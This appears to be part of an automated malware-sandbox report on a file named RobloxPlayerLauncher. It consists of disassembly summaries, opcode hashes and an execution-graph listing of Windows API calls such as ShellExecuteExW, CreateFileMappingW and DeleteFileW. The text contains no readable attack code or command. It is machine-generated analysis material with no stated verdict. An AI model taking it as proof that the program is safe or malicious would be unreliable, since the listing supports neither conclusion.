              • VerSetConditionMask.KERNEL32(00000000), ref: 00739803
              • VerifyVersionInfoW.KERNEL32(?,00000023,00000000), ref: 0073982A
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ConditionMask$InfoVerifyVersion
              • String ID:
              • API String ID: 2793162063-0
              • Opcode ID: 7f9974edc91e67c5b335ff852e2345ef807f74dc64ef17fbcb09929a14065d8e
              • Instruction ID: 5ad1736ca2592f434ef09548c4020ba978a22c7e7ffb907a31de16c4894bf7d7
              • Opcode Fuzzy Hash: 7f9974edc91e67c5b335ff852e2345ef807f74dc64ef17fbcb09929a14065d8e
              • Instruction Fuzzy Hash: E701E1B494431CBAEB24DF64DC46FEA7B7CEB45710F004499BA08A7281D6B45B848FD0
              APIs
              • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00A1DC02,00000000,00000001,00000000,00000000,?,00A08F84,00000000,00000000,00000000), ref: 00A26B12
              • GetLastError.KERNEL32(?,00A1DC02,00000000,00000001,00000000,00000000,?,00A08F84,00000000,00000000,00000000,00000000,00000000,?,00A09542,00000000), ref: 00A26B1E
                • Part of subcall function 00A26AE4: CloseHandle.KERNEL32(FFFFFFFE,00A26B2E,?,00A1DC02,00000000,00000001,00000000,00000000,?,00A08F84,00000000,00000000,00000000,00000000,00000000), ref: 00A26AF4
              • ___initconout.LIBCMT ref: 00A26B2E
                • Part of subcall function 00A26AA6: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00A26AD5,00A1DBEF,00000000,?,00A08F84,00000000,00000000,00000000,00000000), ref: 00A26AB9
              • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00A1DC02,00000000,00000001,00000000,00000000,?,00A08F84,00000000,00000000,00000000,00000000), ref: 00A26B43
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
              • String ID:
              • API String ID: 2744216297-0
              • Opcode ID: 5c8fa56f659d425ecb0a7bb21ed930f25a2abfbf0f63debc47fb9c0f9a5aabcb
              • Instruction ID: 6ab1de80ea00b0be4c20effff87100f13226eac9d3ed6b270339deecbbe508c2
              • Opcode Fuzzy Hash: 5c8fa56f659d425ecb0a7bb21ed930f25a2abfbf0f63debc47fb9c0f9a5aabcb
              • Instruction Fuzzy Hash: 6BF0AC3A551265BFCF225FD9EC09A9E7F36EB497A1B055020FE1895130C7329D60EB90
              APIs
              • Concurrency::cancel_current_task.LIBCPMT ref: 008CFF97
              • __floor_pentium4.LIBCMT ref: 008CFFDE
              Strings
              • invalid hash bucket count, xrefs: 008CFF88
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Concurrency::cancel_current_task__floor_pentium4
              • String ID: invalid hash bucket count
              • API String ID: 1502093491-1101463472
              • Opcode ID: cba243fe23321a09e3f88d9b5e296b3f20218b93a99d44deef62dd5ec63cef53
              • Instruction ID: c26d6e7736cf2b3fdcfe5174d81fc0d9a04506d1c2c8ea162894db21cc09bb6e
              • Opcode Fuzzy Hash: cba243fe23321a09e3f88d9b5e296b3f20218b93a99d44deef62dd5ec63cef53
              • Instruction Fuzzy Hash: 64C19F75A00219DFDB14DF58C480AA9FBB6FF88300B1486ADE959EB352D730ED81CB90
              APIs
              • __startOneArgErrorHandling.LIBCMT ref: 00A17CFD
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorHandling__start
              • String ID: pow
              • API String ID: 3213639722-2276729525
              • Opcode ID: c90fe7bb81a19ad720f0acaff5d418401ceee380aefc8b0b7499ae07bc9b8415
              • Instruction ID: bd2ad5233186a692fa51379eab76f6bbf55b4b59b7ac07ac127ec1446c598ccc
              • Opcode Fuzzy Hash: c90fe7bb81a19ad720f0acaff5d418401ceee380aefc8b0b7499ae07bc9b8415
              • Instruction Fuzzy Hash: 48514471A1C21686CB217B1CFA013BE2BB4EF55750F209968E0D2462E9EF348CD19A86
              APIs
              • Concurrency::cancel_current_task.LIBCPMT ref: 00726DC6
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Concurrency::cancel_current_task
              • String ID: false$true
              • API String ID: 118556049-2658103896
              • Opcode ID: 921c0e0cce044306f8ba2d7de854dbff227f2515986b4932abfdcdd4e39f0697
              • Instruction ID: b45e0cac3acaf81b098312b851e8e38e0996a21986bd70b72afb123ff100ef4a
              • Opcode Fuzzy Hash: 921c0e0cce044306f8ba2d7de854dbff227f2515986b4932abfdcdd4e39f0697
              • Instruction Fuzzy Hash: 2D51B2B1D0035CDADB11DFA4D840BEEBBF8EF04704F10855AE945AB281E774AA84CBE1
              APIs
              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,?,?,00000000,?,00000000,?,?,0071E3D1), ref: 0072133A
              • GetLastError.KERNEL32(?,0071E3D1), ref: 0072134E
              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,0071E3D1), ref: 00721366
              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,?,00000000), ref: 0072138D
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ByteCharMultiWide$ErrorLast
              • String ID:
              • API String ID: 1717984340-0
              • Opcode ID: c1c5385418392e8f87e3c1943553acc18012892f6346dab3d9a6c54c88a8a4ea
              • Instruction ID: b4d84ec86d5e588da7a49d6cb4c71f6b18cf49bf0fb3342568856af0c287df21
              • Opcode Fuzzy Hash: c1c5385418392e8f87e3c1943553acc18012892f6346dab3d9a6c54c88a8a4ea
              • Instruction Fuzzy Hash: 0E412471600219FBDB109E68EC45FAABB6EFF21350F604125FD08DA582DB76AD20C7A0
              APIs
              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,0074A25D,?,3FFFFFFF,?,?,?), ref: 0074BC9D
              • HeapFree.KERNEL32(00000000,?,?,00000000,?,0074A25D,?,3FFFFFFF,?,?,?), ref: 0074BCA4
              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,0074A25D,?,3FFFFFFF,?,?,?), ref: 0074BCC9
              • HeapFree.KERNEL32(00000000,?,?,00000000,?,0074A25D,?,3FFFFFFF,?,?,?), ref: 0074BCD0
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Heap$FreeProcess
              • String ID:
              • API String ID: 3859560861-0
              • Opcode ID: e13fd191faa818fe9c2110d43a3b253eec779a9419b3e6cfec90cae08bdd922e
              • Instruction ID: 512222a3f6d01c0830684f23d8fd5a0ccee95eb6aa6e6d7186eb0971da798527
              • Opcode Fuzzy Hash: e13fd191faa818fe9c2110d43a3b253eec779a9419b3e6cfec90cae08bdd922e
              • Instruction Fuzzy Hash: 1A01B9796053109FDB208F99DC8875A7BA8FF8A732F054559F5198B290CB759C02CBF0

              Execution Graph

              Execution Coverage:9.7%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:3.5%
              Total number of Nodes:1493
              Total number of Limit Nodes:33
23164 b5deee 23163->23164 23165 b5df06 23164->23165 23166 b5de67 DloadProtectSection 3 API calls 23164->23166 23187 b5df0f 8 API calls 2 library calls 23165->23187 23166->23165 23169 b5dc9a DloadLock 3 API calls 23168->23169 23170 b5dd2a 23169->23170 23171 b5ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23170->23171 23172 b5dc78 23171->23172 23172->23154 23173 b5de67 23172->23173 23175 b5de7c DloadObtainSection 23173->23175 23174 b5deb7 VirtualProtect 23176 b5de82 23174->23176 23175->23174 23175->23176 23186 b5dd72 VirtualQuery GetSystemInfo 23175->23186 23176->23154 23179 b5dca7 23178->23179 23180 b5dcab 23178->23180 23179->23159 23181 b5dcb3 GetModuleHandleW 23180->23181 23182 b5dcaf 23180->23182 23183 b5dcc5 23181->23183 23184 b5dcc9 GetProcAddress 23181->23184 23182->23159 23183->23159 23184->23183 23185 b5dcd9 GetProcAddress 23184->23185 23185->23183 23186->23174 23187->23162 23188 b5d891 19 API calls ___delayLoadHelper2@8 24762 b57090 114 API calls 24763 b5cc90 70 API calls 24810 b5a990 97 API calls 24811 b59b90 GdipCloneImage GdipAlloc 24812 b69b90 21 API calls 2 library calls 24765 b5a89d 78 API calls 24766 b4ea98 FreeLibrary 23194 b41385 82 API calls 3 library calls 24767 b6ac0e 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24814 b65780 QueryPerformanceFrequency QueryPerformanceCounter 24816 b5ebf7 20 API calls 24818 b6abfd 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 23386 b5e1f9 23387 b5e203 23386->23387 23388 b5df59 ___delayLoadHelper2@8 19 API calls 23387->23388 23389 b5e210 23388->23389 23392 b5aee0 23393 b5aeea __EH_prolog 23392->23393 23555 b4130b 23393->23555 23396 b5af2c 23400 b5afa2 23396->23400 23401 b5af39 23396->23401 23427 b5af18 23396->23427 23397 b5b5cb 23627 b5cd2e 23397->23627 23404 b5b041 GetDlgItemTextW 23400->23404 23410 b5afbc 23400->23410 23405 b5af75 23401->23405 23406 b5af3e 23401->23406 23402 b5b5f7 23408 b5b611 GetDlgItem SendMessageW 23402->23408 23409 b5b600 
SendDlgItemMessageW 23402->23409 23403 b5b5e9 SendMessageW 23403->23402 23404->23405 23407 b5b077 23404->23407 23411 b5af96 KiUserCallbackDispatcher 23405->23411 23405->23427 23415 b4ddd1 53 API calls 23406->23415 23406->23427 23412 b5b08f GetDlgItem 23407->23412 23552 b5b080 23407->23552 23645 b59da4 GetCurrentDirectoryW 23408->23645 23409->23408 23414 b4ddd1 53 API calls 23410->23414 23411->23427 23418 b5b0c5 SetFocus 23412->23418 23419 b5b0a4 SendMessageW SendMessageW 23412->23419 23420 b5afde SetDlgItemTextW 23414->23420 23416 b5af58 23415->23416 23667 b41241 SHGetMalloc 23416->23667 23417 b5b641 GetDlgItem 23422 b5b664 SetWindowTextW 23417->23422 23423 b5b65e 23417->23423 23424 b5b0d5 23418->23424 23436 b5b0ed 23418->23436 23419->23418 23425 b5afec 23420->23425 23646 b5a2c7 GetClassNameW 23422->23646 23423->23422 23430 b4ddd1 53 API calls 23424->23430 23425->23427 23434 b5aff9 GetMessageW 23425->23434 23426 b5af5f 23426->23427 23431 b5af63 SetDlgItemTextW 23426->23431 23428 b5b56b 23432 b4ddd1 53 API calls 23428->23432 23435 b5b0df 23430->23435 23431->23427 23437 b5b57b SetDlgItemTextW 23432->23437 23434->23427 23439 b5b010 IsDialogMessageW 23434->23439 23668 b5cb5a 23435->23668 23444 b4ddd1 53 API calls 23436->23444 23442 b5b58f 23437->23442 23439->23425 23441 b5b01f TranslateMessage DispatchMessageW 23439->23441 23441->23425 23447 b4ddd1 53 API calls 23442->23447 23446 b5b124 23444->23446 23445 b5b6af 23454 b4ddd1 53 API calls 23445->23454 23456 b5b6df 23445->23456 23449 b4400a _swprintf 51 API calls 23446->23449 23450 b5b5b8 23447->23450 23448 b5bdf5 98 API calls 23448->23445 23455 b5b136 23449->23455 23457 b4ddd1 53 API calls 23450->23457 23451 b5b0e6 23565 b4a04f 23451->23565 23461 b5b6c2 SetDlgItemTextW 23454->23461 23462 b5cb5a 16 API calls 23455->23462 23463 b5bdf5 98 API calls 23456->23463 23491 b5b797 23456->23491 23457->23427 23458 b5b847 23464 b5b850 EnableWindow 23458->23464 23465 b5b859 23458->23465 23459 b5b174 GetLastError 23460 b5b17f 
23459->23460 23571 b5a322 SetCurrentDirectoryW 23460->23571 23467 b4ddd1 53 API calls 23461->23467 23462->23451 23468 b5b6fa 23463->23468 23464->23465 23469 b5b876 23465->23469 23686 b412c8 GetDlgItem EnableWindow 23465->23686 23471 b5b6d6 SetDlgItemTextW 23467->23471 23477 b5b70c 23468->23477 23492 b5b731 23468->23492 23476 b5b89d 23469->23476 23485 b5b895 SendMessageW 23469->23485 23470 b5b195 23474 b5b1ac 23470->23474 23475 b5b19e GetLastError 23470->23475 23471->23456 23473 b5b78a 23480 b5bdf5 98 API calls 23473->23480 23484 b5b227 23474->23484 23487 b5b237 23474->23487 23489 b5b1c4 GetTickCount 23474->23489 23475->23474 23476->23427 23481 b4ddd1 53 API calls 23476->23481 23684 b59635 32 API calls 23477->23684 23479 b5b86c 23687 b412c8 GetDlgItem EnableWindow 23479->23687 23480->23491 23486 b5b8b6 SetDlgItemTextW 23481->23486 23482 b5b725 23482->23492 23484->23487 23488 b5b46c 23484->23488 23485->23476 23486->23427 23494 b5b407 23487->23494 23495 b5b24f GetModuleFileNameW 23487->23495 23587 b412e6 GetDlgItem ShowWindow 23488->23587 23496 b4400a _swprintf 51 API calls 23489->23496 23490 b5b825 23685 b59635 32 API calls 23490->23685 23491->23458 23491->23490 23499 b4ddd1 53 API calls 23491->23499 23492->23473 23500 b5bdf5 98 API calls 23492->23500 23494->23405 23507 b4ddd1 53 API calls 23494->23507 23678 b4eb3a 80 API calls 23495->23678 23503 b5b1dd 23496->23503 23498 b5b844 23498->23458 23499->23491 23504 b5b75f 23500->23504 23501 b5b47c 23588 b412e6 GetDlgItem ShowWindow 23501->23588 23572 b4971e 23503->23572 23504->23473 23509 b5b768 DialogBoxParamW 23504->23509 23506 b5b275 23511 b4400a _swprintf 51 API calls 23506->23511 23508 b5b41b 23507->23508 23512 b4400a _swprintf 51 API calls 23508->23512 23509->23405 23509->23473 23510 b5b486 23514 b4ddd1 53 API calls 23510->23514 23515 b5b297 CreateFileMappingW 23511->23515 23517 b5b439 23512->23517 23519 b5b490 SetDlgItemTextW 23514->23519 23516 b5b2f9 GetCommandLineW 23515->23516 23549 b5b376 __vswprintf_c_l 
23515->23549 23521 b5b30a 23516->23521 23531 b4ddd1 53 API calls 23517->23531 23518 b5b203 23522 b5b215 23518->23522 23523 b5b20a GetLastError 23518->23523 23589 b412e6 GetDlgItem ShowWindow 23519->23589 23679 b5ab2e SHGetMalloc 23521->23679 23580 b49653 23522->23580 23523->23522 23524 b5b381 ShellExecuteExW 23544 b5b39e 23524->23544 23525 b5b4a2 SetDlgItemTextW GetDlgItem 23528 b5b4d7 23525->23528 23529 b5b4bf GetWindowLongW SetWindowLongW 23525->23529 23590 b5bdf5 23528->23590 23529->23528 23530 b5b326 23680 b5ab2e SHGetMalloc 23530->23680 23531->23405 23535 b5b332 23681 b5ab2e SHGetMalloc 23535->23681 23536 b5b3e1 23536->23494 23543 b5b3f7 UnmapViewOfFile CloseHandle 23536->23543 23537 b5bdf5 98 API calls 23539 b5b4f3 23537->23539 23615 b5d0f5 23539->23615 23540 b5b33e 23682 b4ecad 80 API calls ___scrt_get_show_window_mode 23540->23682 23543->23494 23544->23536 23547 b5b3cd Sleep 23544->23547 23546 b5b355 MapViewOfFile 23546->23549 23547->23536 23547->23544 23548 b5bdf5 98 API calls 23553 b5b519 23548->23553 23549->23524 23550 b5b542 23683 b412c8 GetDlgItem EnableWindow 23550->23683 23552->23405 23552->23428 23553->23550 23554 b5bdf5 98 API calls 23553->23554 23554->23550 23556 b41314 23555->23556 23557 b4136d 23555->23557 23558 b4137a 23556->23558 23688 b4da98 62 API calls 2 library calls 23556->23688 23689 b4da71 GetWindowLongW SetWindowLongW 23557->23689 23558->23396 23558->23397 23558->23427 23561 b41336 23561->23558 23562 b41349 GetDlgItem 23561->23562 23562->23558 23563 b41359 23562->23563 23563->23558 23564 b4135f SetWindowTextW 23563->23564 23564->23558 23568 b4a059 23565->23568 23566 b4a0ea 23567 b4a207 9 API calls 23566->23567 23569 b4a113 23566->23569 23567->23569 23568->23566 23568->23569 23690 b4a207 23568->23690 23569->23459 23569->23460 23571->23470 23573 b49728 23572->23573 23574 b49792 CreateFileW 23573->23574 23575 b49786 23573->23575 23574->23575 23576 b497e4 23575->23576 23577 b4b66c 2 API calls 23575->23577 23576->23518 23578 b497cb 
23577->23578 23578->23576 23579 b497cf CreateFileW 23578->23579 23579->23576 23581 b49688 23580->23581 23582 b49677 23580->23582 23581->23484 23582->23581 23583 b49683 23582->23583 23584 b4968a 23582->23584 23711 b49817 23583->23711 23716 b496d0 23584->23716 23587->23501 23588->23510 23589->23525 23591 b5bdff __EH_prolog 23590->23591 23592 b5b4e5 23591->23592 23593 b5aa36 ExpandEnvironmentStringsW 23591->23593 23592->23537 23604 b5be36 _wcsrchr 23593->23604 23595 b5aa36 ExpandEnvironmentStringsW 23595->23604 23596 b5c11d SetWindowTextW 23596->23604 23599 b635de 22 API calls 23599->23604 23601 b5bf0b SetFileAttributesW 23603 b5bfc5 GetFileAttributesW 23601->23603 23614 b5bf25 ___scrt_get_show_window_mode 23601->23614 23603->23604 23606 b5bfd7 DeleteFileW 23603->23606 23604->23592 23604->23595 23604->23596 23604->23599 23604->23601 23607 b5c2e7 GetDlgItem SetWindowTextW SendMessageW 23604->23607 23610 b5c327 SendMessageW 23604->23610 23731 b517ac CompareStringW 23604->23731 23732 b59da4 GetCurrentDirectoryW 23604->23732 23734 b4a52a 7 API calls 23604->23734 23735 b4a4b3 FindClose 23604->23735 23736 b5ab9a 76 API calls new 23604->23736 23606->23604 23608 b5bfe8 23606->23608 23607->23604 23609 b4400a _swprintf 51 API calls 23608->23609 23611 b5c008 GetFileAttributesW 23609->23611 23610->23604 23611->23608 23612 b5c01d MoveFileW 23611->23612 23612->23604 23613 b5c035 MoveFileExW 23612->23613 23613->23604 23614->23603 23614->23604 23733 b4b4f7 52 API calls 2 library calls 23614->23733 23616 b5d0ff __EH_prolog 23615->23616 23737 b4fead 23616->23737 23618 b5d130 23741 b45c59 23618->23741 23620 b5d14e 23745 b47c68 23620->23745 23624 b5d1a1 23762 b47cfb 23624->23762 23626 b5b504 23626->23548 23628 b5cd38 23627->23628 24235 b59d1a 23628->24235 23631 b5cd45 GetWindow 23632 b5b5d1 23631->23632 23633 b5cd65 23631->23633 23632->23402 23632->23403 23633->23632 23634 b5cd72 GetClassNameW 23633->23634 23636 b5cd96 GetWindowLongW 23633->23636 23637 b5cdfa GetWindow 23633->23637 24240 
b517ac CompareStringW 23634->24240 23636->23637 23638 b5cda6 SendMessageW 23636->23638 23637->23632 23637->23633 23638->23637 23639 b5cdbc GetObjectW 23638->23639 24241 b59d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23639->24241 23641 b5cdd3 24242 b59d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23641->24242 24243 b59f5d 8 API calls ___scrt_get_show_window_mode 23641->24243 23644 b5cde4 SendMessageW DeleteObject 23644->23637 23645->23417 23647 b5a30d 23646->23647 23648 b5a2e8 23646->23648 23650 b5a312 SHAutoComplete 23647->23650 23651 b5a31b 23647->23651 24246 b517ac CompareStringW 23648->24246 23650->23651 23654 b5a7c3 23651->23654 23652 b5a2fb 23652->23647 23653 b5a2ff FindWindowExW 23652->23653 23653->23647 23655 b5a7cd __EH_prolog 23654->23655 23656 b41380 82 API calls 23655->23656 23657 b5a7ef 23656->23657 24247 b41f4f 23657->24247 23660 b5a809 23662 b41631 84 API calls 23660->23662 23661 b5a818 23663 b41951 126 API calls 23661->23663 23664 b5a814 23662->23664 23666 b5a83a __vswprintf_c_l new 23663->23666 23664->23445 23664->23448 23665 b41631 84 API calls 23665->23664 23666->23664 23666->23665 23667->23426 23669 b5ac74 5 API calls 23668->23669 23670 b5cb66 GetDlgItem 23669->23670 23671 b5cbbc SendMessageW SendMessageW 23670->23671 23672 b5cb88 23670->23672 23673 b5cc17 SendMessageW SendMessageW SendMessageW 23671->23673 23674 b5cbf8 23671->23674 23677 b5cb93 ShowWindow SendMessageW SendMessageW 23672->23677 23675 b5cc6d SendMessageW 23673->23675 23676 b5cc4a SendMessageW 23673->23676 23674->23673 23675->23451 23676->23675 23677->23671 23678->23506 23679->23530 23680->23535 23681->23540 23682->23546 23683->23552 23684->23482 23685->23498 23686->23479 23687->23469 23688->23561 23689->23558 23691 b4a214 23690->23691 23692 b4a238 23691->23692 23693 b4a22b CreateDirectoryW 23691->23693 23694 b4a180 4 API calls 23692->23694 23693->23692 23695 b4a26b 23693->23695 23696 b4a23e 23694->23696 23699 b4a27a 23695->23699 23703 b4a444 23695->23703 23697 b4a27e 
GetLastError 23696->23697 23700 b4b66c 2 API calls 23696->23700 23697->23699 23699->23568 23701 b4a254 23700->23701 23701->23697 23702 b4a258 CreateDirectoryW 23701->23702 23702->23695 23702->23697 23704 b5e360 23703->23704 23705 b4a451 SetFileAttributesW 23704->23705 23706 b4a494 23705->23706 23707 b4a467 23705->23707 23706->23699 23708 b4b66c 2 API calls 23707->23708 23709 b4a47b 23708->23709 23709->23706 23710 b4a47f SetFileAttributesW 23709->23710 23710->23706 23712 b49824 23711->23712 23713 b49820 23711->23713 23712->23713 23722 b4a12d 23712->23722 23713->23581 23717 b496dc 23716->23717 23718 b496fa 23716->23718 23717->23718 23720 b496e8 FindCloseChangeNotification 23717->23720 23719 b49719 23718->23719 23730 b46e3e 74 API calls 23718->23730 23719->23581 23720->23718 23723 b5e360 23722->23723 23724 b4a13a DeleteFileW 23723->23724 23725 b4984c 23724->23725 23726 b4a14d 23724->23726 23725->23581 23727 b4b66c 2 API calls 23726->23727 23728 b4a161 23727->23728 23728->23725 23729 b4a165 DeleteFileW 23728->23729 23729->23725 23730->23719 23731->23604 23732->23604 23733->23614 23734->23604 23735->23604 23736->23604 23738 b4feba 23737->23738 23766 b41789 23738->23766 23740 b4fed2 23740->23618 23742 b4fead 23741->23742 23743 b41789 76 API calls 23742->23743 23744 b4fed2 23743->23744 23744->23620 23746 b47c72 __EH_prolog 23745->23746 23783 b4c827 23746->23783 23748 b47c8d 23789 b5e24a 23748->23789 23750 b47cb7 23795 b5440b 23750->23795 23753 b47ddf 23755 b47de9 23753->23755 23759 b47e53 23755->23759 23827 b4a4c6 23755->23827 23756 b47f06 23756->23624 23757 b47ec4 23757->23756 23833 b46dc1 74 API calls 23757->23833 23759->23757 23761 b4a4c6 8 API calls 23759->23761 23805 b4837f 23759->23805 23761->23759 23763 b47d09 23762->23763 23765 b47d10 23762->23765 23764 b51acf 84 API calls 23763->23764 23764->23765 23767 b4179f 23766->23767 23778 b417fa __vswprintf_c_l 23766->23778 23768 b417c8 23767->23768 23779 b46e91 74 API calls __vswprintf_c_l 23767->23779 23769 b41827 
23768->23769 23775 b417e7 new 23768->23775 23772 b635de 22 API calls 23769->23772 23771 b417be 23780 b46efd 75 API calls 23771->23780 23774 b4182e 23772->23774 23774->23778 23782 b46efd 75 API calls 23774->23782 23775->23778 23781 b46efd 75 API calls 23775->23781 23778->23740 23779->23771 23780->23768 23781->23778 23782->23778 23784 b4c831 __EH_prolog 23783->23784 23785 b5e24a new 8 API calls 23784->23785 23787 b4c874 23785->23787 23786 b5e24a new 8 API calls 23788 b4c898 23786->23788 23787->23786 23788->23748 23792 b5e24f new 23789->23792 23790 b5e27b 23790->23750 23792->23790 23801 b671ad 7 API calls 2 library calls 23792->23801 23802 b5ecce RaiseException FindHandler new 23792->23802 23803 b5ecb1 RaiseException Concurrency::cancel_current_task FindHandler 23792->23803 23796 b54415 __EH_prolog 23795->23796 23797 b5e24a new 8 API calls 23796->23797 23798 b54431 23797->23798 23799 b47ce6 23798->23799 23804 b506ba 78 API calls 23798->23804 23799->23753 23801->23792 23804->23799 23806 b48389 __EH_prolog 23805->23806 23834 b41380 23806->23834 23808 b483a4 23842 b49ef7 23808->23842 23814 b483d3 23965 b41631 23814->23965 23815 b4846e 23861 b48517 23815->23861 23819 b484ce 23868 b41f00 23819->23868 23822 b484d9 23822->23814 23872 b43aac 23822->23872 23882 b4857b 23822->23882 23824 b4a4c6 8 API calls 23825 b483cf 23824->23825 23825->23814 23825->23815 23825->23824 23969 b4bac4 CompareStringW 23825->23969 23828 b4a4db 23827->23828 23829 b4a4df 23828->23829 24223 b4a5f4 23828->24223 23829->23755 23831 b4a4ef 23831->23829 23832 b4a4f4 FindClose 23831->23832 23832->23829 23833->23756 23835 b41385 __EH_prolog 23834->23835 23836 b4c827 8 API calls 23835->23836 23837 b413bd 23836->23837 23838 b5e24a new 8 API calls 23837->23838 23841 b41416 ___scrt_get_show_window_mode 23837->23841 23839 b41403 23838->23839 23839->23841 23970 b4b07d 23839->23970 23841->23808 23843 b49f0e 23842->23843 23845 b483ba 23843->23845 23986 b46f5d 76 API calls 23843->23986 23845->23814 23846 b419a6 
23845->23846 23847 b419b0 __EH_prolog 23846->23847 23856 b41a00 23847->23856 23857 b419e5 23847->23857 23987 b4709d 23847->23987 23849 b41b50 23990 b46dc1 74 API calls 23849->23990 23851 b43aac 97 API calls 23854 b41bb3 23851->23854 23852 b41b60 23852->23851 23852->23857 23853 b41bff 23853->23857 23859 b41c32 23853->23859 23991 b46dc1 74 API calls 23853->23991 23854->23853 23858 b43aac 97 API calls 23854->23858 23856->23849 23856->23852 23856->23857 23857->23825 23858->23854 23859->23857 23860 b43aac 97 API calls 23859->23860 23860->23859 23862 b48524 23861->23862 24009 b50c26 GetSystemTime SystemTimeToFileTime 23862->24009 23864 b48488 23864->23819 23865 b51359 23864->23865 24011 b5d51a 23865->24011 23870 b41f05 __EH_prolog 23868->23870 23869 b41f39 23869->23822 23870->23869 24019 b41951 23870->24019 23873 b43abc 23872->23873 23874 b43ab8 23872->23874 23875 b43af7 23873->23875 23876 b43ae9 23873->23876 23874->23822 24154 b427e8 97 API calls 3 library calls 23875->24154 23880 b43b29 23876->23880 24153 b43281 85 API calls 3 library calls 23876->24153 23879 b43af5 23879->23880 24155 b4204e 74 API calls 23879->24155 23880->23822 23883 b48585 __EH_prolog 23882->23883 23884 b485be 23883->23884 23900 b485c2 23883->23900 24177 b584bd 99 API calls 23883->24177 23885 b485e7 23884->23885 23889 b4867a 23884->23889 23884->23900 23887 b48609 23885->23887 23885->23900 24178 b47b66 151 API calls 23885->24178 23887->23900 24179 b584bd 99 API calls 23887->24179 23889->23900 24156 b45e3a 23889->24156 23892 b48705 23892->23900 24162 b4826a 23892->24162 23895 b48875 23896 b4a4c6 8 API calls 23895->23896 23897 b488e0 23895->23897 23896->23897 24166 b47d6c 23897->24166 23899 b4c991 80 API calls 23908 b4893b _memcmp 23899->23908 23900->23822 23901 b48a70 23902 b48b43 23901->23902 23909 b48abf 23901->23909 23906 b48b9e 23902->23906 23919 b48b4e 23902->23919 23903 b48a69 24182 b41f94 74 API calls 23903->24182 23916 b48b30 23906->23916 24185 b480ea 96 API calls 23906->24185 23907 b48b9c 
23912 b49653 79 API calls 23907->23912 23908->23899 23908->23900 23908->23901 23908->23903 24180 b48236 82 API calls 23908->24180 24181 b41f94 74 API calls 23908->24181 23913 b4a180 4 API calls 23909->23913 23909->23916 23911 b49653 79 API calls 23911->23900 23912->23900 23915 b48af7 23913->23915 23914 b48c09 23929 b48c74 23914->23929 23956 b491c1 pre_c_initialization 23914->23956 24186 b49989 23914->24186 23915->23916 24183 b49377 96 API calls 23915->24183 23916->23907 23916->23914 23917 b4aa88 8 API calls 23921 b48cc3 23917->23921 23919->23907 24184 b47f26 100 API calls pre_c_initialization 23919->24184 23924 b4aa88 8 API calls 23921->23924 23922 b48c4c 23922->23929 24190 b41f94 74 API calls 23922->24190 23928 b48cd9 23924->23928 23926 b48c62 24191 b47061 75 API calls 23926->24191 23932 b48d9c 23928->23932 24192 b49b21 SetFilePointer GetLastError SetEndOfFile 23928->24192 23929->23917 23930 b48df7 23933 b48e69 23930->23933 23939 b48e07 23930->23939 23931 b48efd 23935 b48f23 23931->23935 23936 b48f0f 23931->23936 23952 b48e27 23931->23952 23932->23930 23932->23931 23934 b4826a CharUpperW 23933->23934 23940 b48e84 23934->23940 23938 b52c42 75 API calls 23935->23938 23937 b492e6 121 API calls 23936->23937 23937->23952 23942 b48f3c 23938->23942 23943 b48e4d 23939->23943 23945 b48e15 23939->23945 23948 b48eb4 23940->23948 23949 b48ead 23940->23949 23940->23952 24197 b528f1 121 API calls 23942->24197 23943->23952 24194 b47907 108 API calls 23943->24194 24193 b41f94 74 API calls 23945->24193 24196 b49224 94 API calls __EH_prolog 23948->24196 24195 b47698 84 API calls pre_c_initialization 23949->24195 23955 b4904b 23952->23955 24198 b41f94 74 API calls 23952->24198 23954 b49156 23954->23956 23958 b4a444 4 API calls 23954->23958 23955->23954 23955->23956 